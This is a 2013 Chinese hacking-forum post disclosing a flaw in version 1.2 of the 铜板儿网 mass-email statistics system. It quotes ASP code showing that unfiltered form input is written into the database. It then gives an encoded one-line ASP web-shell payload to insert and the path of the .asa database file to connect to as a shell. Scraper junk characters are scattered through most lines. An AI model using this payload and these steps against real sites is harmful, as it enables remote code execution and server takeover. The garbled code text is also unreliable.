找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2459|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 3 v& a, @; t/ s: g: t/ Q+ u
" Q$ w/ C# Y1 `8 a4 R1 O: F. |4 c
IF Request.QueryString("Action")="del" Then
+ d/ Y  ~8 J- g; u7 W; wID=Request.QueryString("ID")
" F1 \5 f. f9 \' FIF Countss ("tui","Fenlei",ID )<>0 then
5 x3 R: @2 [- a% l! r'略 : b) [, u/ x# I- C" Q! q
IF Request.QueryString("Action")="Add" Then
+ Q0 P8 B4 ?  a+ f" r' s6 gTname=Request.Form("Typename") 7 {  r& n, x) \  ~
Set Rs=Server.CreateObject("adodb.Recordset") ; w& @' l4 U* p
Sql="Select * From Fenlei Order by id Desc " : i5 ^7 R0 i. w/ E: G/ A
Rs.Open Sql,Conn,1,3 4 c6 y& O7 `2 u0 t1 _: P# A, [2 a
Rs.Addnew / J6 ?" l5 Q0 U6 m& _2 W( {
Rs("Typename")=Tname
* `; D' }) Q9 I7 w& F8 X. e, @9 f'略
' z  _; D1 w; Q( `. Y  _5 cSet Rs=Server.CreateObject("adodb.Recordset")
  {8 p  X9 P( j- G$ n, g+ E0 B* |Sql="Select * From Fenlei Order by id Desc "
+ ~. B; b9 z, A0 RRs.Open Sql,Conn,1,1
. r4 @% n- R) ?$ H'略 5 t' F5 t2 B* n4 R: e& e& C8 Z( |
%>
3 x/ Q( V  Q( }* C 0 o, T  }& P" F% q

' v* L5 l; c" D3 h; D
7 p  f6 f( Q. ?8 C+ F4 }没有过滤,直接写入数据库。
& Y3 A/ L8 V7 O% z: r$ g8 n0 h6 u ; a& x: ~' v- h/ b
利用方法:' `* l1 ~" D/ m8 k7 ^- s+ k
% p' D: j6 s/ f. I+ e. Q
插入:┼攠數畣整爠煥敵瑳∨≡┩>
+ _5 ]8 j! I' V2 l" f. c, j! p
$ G2 y$ @/ m- @8 } # F& W  o0 O; x6 Z$ b) p5 P& G* s
连接: http://www.xxx.com/###tongbaner.asa
3 t9 r) R: J' M) B$ H$ q8 W'默认安装文件:
# F5 J0 D0 j) Z" L9 Y; I" U'install.asp2 W5 @2 E/ x' e- [1 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表